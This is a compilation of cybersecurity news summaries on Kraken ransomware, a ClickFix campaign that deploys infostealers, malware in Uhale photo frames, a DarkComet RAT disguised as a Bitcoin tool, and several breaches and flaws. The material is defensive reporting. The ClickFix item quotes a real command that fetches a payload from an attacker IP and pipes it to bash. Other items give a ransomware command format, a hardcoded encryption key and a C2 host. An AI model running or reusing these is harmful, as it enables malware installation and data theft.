• In August 2025, a new ransomware threat emerged with capabilities that fundamentally changed how organizations should approach enterprise security.

    Kraken, a Russian-speaking cybercriminal group, began executing sophisticated attacks targeting large organizations across multiple continents.

    What makes Kraken particularly dangerous is its ability to attack Windows, Linux, and VMware ESXi systems with platform-specific tools, making it one of the first truly cross-platform ransomware threats to gain widespread notoriety in enterprise circles.

    The Kraken group appears to be connected to the HelloKitty ransomware operation, with security researchers suspecting the group emerged from the remnants of that previous criminal organization.

    Kraken data leak blog (Source - Cisco Talos)
    Kraken data leak blog (Source – Cisco Talos)

    This connection becomes evident through shared ransom note filenames and explicit references on the group’s leak site.

    Kraken ransom note (Source - Cisco Talos)
    Kraken ransom note (Source – Cisco Talos)

    In September 2025, Kraken announced a new underground forum called “The Last Haven Board,” designed to create a secure communication hub for the cybercriminal community.

    Notably, HelloKitty operators announced their support for this new platform, solidifying the link between these groups.

    Cisco Talos security analysts identified Kraken conducting double-extortion attacks in which victims are both encrypted and threatened with data publication.

    The group employs a sophisticated multi-stage attack methodology that begins with SMB vulnerability exploitation on internet-exposed servers.

    Kraken infection chain (Source - Cisco Talos)
    Kraken infection chain (Source – Cisco Talos)

    Once inside a system, attackers steal privileged credentials and use them to maintain persistent access through Remote Desktop Protocol connections.

    To establish long-term presence, attackers deploy Cloudflared for creating reverse tunnels and SSH Filesystem tools for data exfiltration.

    Before deploying encryption, the ransomware performs a unique benchmarking operation to measure how fast it can operate on the victim’s machine without causing immediate detection through system resource exhaustion.

    Encryption and Command-Line Flexibility

    Kraken’s technical sophistication becomes apparent through its extensive command-line options. The ransomware uses RSA-4096 and ChaCha20 encryption algorithms, providing strong cryptographic protection.

    Attackers can customize attacks using parameters like timeout delays, file size limits, and encryption depth selections.

    For Windows systems, the command format follows: Encryptor.exe –key <32-byte key> -path <targeted path> -t.

    Linux and ESXi versions use ELF binaries with options like daemon mode execution and SSH remote capabilities.

    The ransomware features partial and full encryption modes, allowing attackers to optimize between encryption speed and maximum damage.

    Notably, Kraken actively encrypts SQL databases and network shares while automatically skipping critical system files and Program Files directories to maintain victim system functionality for ransom negotiations.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Kraken Cross-Platform Ransomware Attacking Windows, Linux, and VMware ESXi Systems in Enterprise Environments appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Microsoft has launched a new security feature in Teams Premium called “Prevent screen capture,” designed to block screenshots and recordings during sensitive meetings. This feature will be available worldwide through late November 2025, addressing growing concerns about data leaks in virtual collaborations across industries such as finance, healthcare, and law, where confidential information is routinely […]

    The post Microsoft Teams Introduces Premium Feature to Prevent Screenshots and Screen Recording appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A growing social engineering technique called ClickFix has emerged as one of the most successful methods for distributing malware in recent months.

    This attack tricks users into copying and running commands directly into their operating systems command line interface, ultimately installing dangerous information-stealing software.

    The technique has proven remarkably effective because it bypasses traditional email security solutions and operates within browser sandboxes where most security tools cannot detect the malicious activity.

    The attack typically begins when users search for cracked software through search engines. Cybercriminals create fake landing pages hosted on trusted platforms like Google Colab, Drive, Sites, and Groups to avoid being blocked by security systems.

    These pages act as initial contact points that redirect victims based on their operating system. Windows users receive the ACR stealer, while macOS users are redirected to pages that deploy the Odyssey infostealer.

    Intel471 security researchers identified this campaign in June 2025 during proactive malware hunting operations.

    The investigation revealed that threat actors were successfully targeting both major operating systems through a single infrastructure.

    Infection chain (Source - Intel471)
    Infection chain (Source – Intel471)

    What makes this attack particularly concerning is its fileless execution. When victims paste the commands, malicious payloads are pulled directly into memory, making them invisible to traditional security software.

    Infection Mechanism and Technical Execution

    For Windows users, the attack chain guides victims through several redirection points before reaching a MEGA file hosting page containing a password-protected ZIP archive.

    Inside this archive sits the ACR stealer disguised as setup.exe. The malware not only steals credentials and personal data but also serves as a loader, installing additional threats such as SharkClipper, a cryptocurrency clipboard hijacker.

    Fake Cloudflare security check which prompts users to run a ClickFix command (Source - Intel471)
    Fake Cloudflare security check which prompts users to run a ClickFix command (Source – Intel471)

    MacOS users encounter a different approach that involves a fake Cloudflare security check page. When users attempt to copy what appears to be a verification string, they actually copy a Base64-encoded shell command.

    Once decoded, this command executes:-

    curl - s http://45.135.232.33/droberto39774 | nohup bash

    This command silently downloads and runs the Odyssey stealer, which harvests passwords, cookies, cryptocurrency wallets, Apple Notes, Keychain entries, and system data, then compresses everything into out.zip for exfiltration.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post New ClickFix Attack Targeting Windows and macOS Users to Deploy Infostealer Malware appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Digital photo frames have become a standard household device for displaying family memories, and most users assume these simple gadgets prioritize simplicity over complexity.

    However, a troubling discovery reveals that specific Android photo frames running the Uhale app automatically download and execute malware as soon as they boot.

    Quokka security analysts noted or identified this critical issue after examining popular digital picture frame models sold on major retail platforms.

    These frames, often marketed under brands like BIGASUO, WONNIE, and MaxAngel, share a common vulnerability that puts millions of users at risk.

    The affected devices are vulnerable to automatic malware installation without user interaction.

    Security analysts at Quokka detected that the security concern extends far beyond simple data theft. These vulnerabilities create complete pathways for attackers to gain full control of the device with minimal effort.

    The malware discovered during the analysis is associated with the Vo1d botnet and the Mzmess malware family, which have already infected an estimated 1.6 million Android TV devices worldwide.

    Entities in the Uhale ecosystem (Source – Quokka)

    When connected to a home or office network, a compromised frame can serve as an entry point for lateral attacks on other devices, potentially leading to widespread network compromise and data exposure.

    The root of the problem lies in how the Uhale application handles security at the software level. Rather than implementing modern security standards, the developers relied on outdated Android 6.0 with disabled security features and hardcoded encryption keys embedded directly in the app code.

    This combination creates multiple vulnerability pathways that skilled attackers can exploit through simple network interception techniques.

    The implications are severe because these frames typically remain continuously connected to networks, providing attackers with persistent access opportunities.

    Remote Code Execution Through Insecure Trust Management

    The primary exploitation vector involves a weakness in how the Uhale app validates security certificates during network communications.

    Workflow for the Uhale 4.2.0 app (Source – Quokka)

    When a frame boots up and checks for app updates, it communicates with servers at dcsdkos.dc16888888.com over HTTPS.

    However, the app implements a custom security validator that accepts any certificate without proper verification.

    This oversight allows attackers positioned on the same network to intercept these connections and inject malicious code.

    The insecure trust manager is implemented in the com.nasa.memory.tool.lf class. Instead of validating that communication partners are legitimate, the checkServerTrusted method simply returns empty values without verifying them.

    When combined with a hardcoded encryption key DE252F9AC7624D723212E7E70972134D stored in the app, attackers can craft responses that the device will accept and decrypt.

    The response contains a download link to a Dalvik Executable file, which the app then loads and executes using Java reflection techniques.

    The execution occurs via the DexClassLoader, which dynamically loads code from external sources.

    The app creates an instance of this class loader pointing to downloaded JAR files stored in the datadatacom.zeasn.framefiles.honor directory.

    It then searches for a predefined entry-point method called com.sun.galaxy.lib.OceanInit.init is invoked automatically.

    Since the Uhale app operates with system-level privileges and the devices have SELinux disabled and su commands available, the injected code immediately runs with unrestricted root access.

    This allows attackers to execute arbitrary shell commands, install persistent malware, modify system files, or harvest sensitive data from other applications.

    The malware samples identified included multiple APK packages classified by Quokka’s behavioral analysis engine as spyware with 100 percent confidence.

    These included com.app.mz.s101, com.app.mz.popan, and several others specifically designed for surveillance and system control purposes.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Android Photo Frames App Downloads Malware, Giving Hackers Control of The Device Without User Interaction appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Payment processor Checkout.com recently experienced a data breach after being targeted by the cybercrime group “ShinyHunters.” The attackers accessed old data stored in a third-party cloud system. Luckily, Checkout.com’s live payment processing environment was not affected, and no merchant funds or card numbers were accessed. The company revealed that the breach happened last week when […]

    The post Checkout.com Suffers Data Breach as ShinyHunters Attack Cloud Storage appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A newly updated cybersecurity advisory from federal agencies reveals that the Akira ransomware operation has significantly escalated its campaign, compromising organizations worldwide and accumulating massive ransom proceeds through sophisticated attack methods. According to the joint advisory released on November 13, 2025, by the FBI, CISA, Department of Defense Cyber Crime Center (DC3), Department of Health […]

    The post CISA Warns: Akira Ransomware Has Extracted $42M After Targeting Hundreds appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Palo Alto Networks has disclosed a denial-of-service vulnerability in its PAN-OS software that allows attackers to force firewalls into unexpected reboots using specially crafted network packets. The flaw, tracked as CVE-2025-4619, affects multiple versions of PAN-OS running on PA-Series and VM-Series firewalls, as well as Prisma Access deployments. The vulnerability enables unauthenticated attackers to trigger […]

    The post Palo Alto PAN-OS Flaw Lets Attackers Force Firewall Reboots via Malicious Packets appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • Following the doxxing of Lumma Stealer’s alleged core members last month, the notorious infostealer initially experienced a significant decline in activity as customers migrated to rival platforms like Vidar and StealC. However, recent telemetry data reveals a concerning resurgence of Lumma Stealer operations beginning the week of October 20, 2025, accompanied by sophisticated new capabilities […]

    The post Lumma Stealer Leverages Browser Fingerprinting for Data Theft and Stealthy C2 Communications appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • A critical zero-day vulnerability in Fortinet FortiWeb has been actively exploited in the wild, allowing attackers to gain complete administrator access without any prior authentication. The flaw affects Fortinet’s Web Application Firewall, which is designed to protect web applications from malicious traffic. Vulnerability Discovery and Exploitation On October 6, 2025, cyber deception company Defused published […]

    The post Fortinet FortiWeb Zero-Day Exploited to Gain Full Admin Access appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

  • The rise of cryptocurrency has created new opportunities for cybercriminals to exploit unsuspecting users.

    Attackers are now disguising the notorious DarkComet remote access trojan as Bitcoin-related applications, targeting cryptocurrency enthusiasts who download tools from unverified sources.

    This malware campaign demonstrates how old threats continue to resurface with modern social engineering techniques.

    DarkComet RAT is a well-known remote access trojan that allows attackers to gain complete control over infected systems.

    Despite being discontinued by its creator years ago, the malware continues to circulate in underground forums and remains highly effective.

    It provides attackers with extensive capabilities including keystroke logging, file theft, webcam surveillance, and remote desktop control.

    These features make it particularly dangerous for cryptocurrency users, as stolen credentials can lead directly to financial losses.

    The malicious file analyzed in this campaign was distributed as a compressed RAR archive containing an executable disguised as “94k BTC wallet.exe.”

    This delivery method helps attackers bypass email filters and reduces detection rates. The executable was packed with UPX (Ultimate Packer for Executables) to further evade antivirus software and hide its true nature from security analysis.

    Point Wild security analysts identified the malware after investigating suspicious Bitcoin-related applications. The research team discovered that once extracted and executed, the fake Bitcoin tool immediately activates DarkComet’s full capabilities.

    Instead of providing any legitimate cryptocurrency functionality, the malware begins establishing persistence on the infected system and attempts to communicate with its command-and-control server.

    Technical Breakdown and Infection Mechanism

    The malware establishes persistence by copying itself to %AppData%\Roaming\MSDCSC\explorer.exe and creating a registry key under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.

    File Info image (Source - Point Wild)
    File Info image (Source – Point Wild)

    This ensures the malware executes automatically every time the system restarts. This shows the file information of the compressed RAR archive, while the one below shows the UPX packing structure visible in CFF Explorer.

    UPX Packed (Source - Point Wild)
    UPX Packed (Source – Point Wild)

    Analysis revealed the sample’s embedded configuration containing critical operational details.

    The malware uses a mutex named DC_MUTEX-ARULYYD to prevent multiple instances from running simultaneously.

    Network analysis showed attempted connections to the command-and-control server at kvejo991.ddns.net over TCP port 1604.

    Although the C2 server was offline during testing, the repeated connection attempts confirmed active beaconing behavior consistent with DarkComet operations.

    The unpacked executable revealed multiple standard PE sections, including .text, .data, and .idata.

    The malware injects its payload into legitimate Windows processes like notepad.exe to perform keylogging and screen capture while remaining hidden.

    Captured keystrokes are stored in log files with names like “2025-10-29-4.dc” before being exfiltrated through the C2 channel.

    File hashes for detection include SHA256: 11bf1088d66bc3a63d16cc9334a05f214a25a47f39713400279e0823c97eb377 for the compressed archive and SHA256: 5b5c276ea74e1086e4835221da50865f872fe20cfc5ea9aa6a909a0b0b9a0554 for the packed executable.

    Users should avoid downloading cryptocurrency tools from untrusted sources and maintain updated security software to detect such threats effectively.

    Follow us on Google NewsLinkedIn, and X to Get More Instant UpdatesSet CSN as a Preferred Source in Google.

    The post Beware of Fake Bitcoin Tool That Hides DarkComet RAT Malware With it appeared first on Cyber Security News.

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶

    ¶¶¶¶¶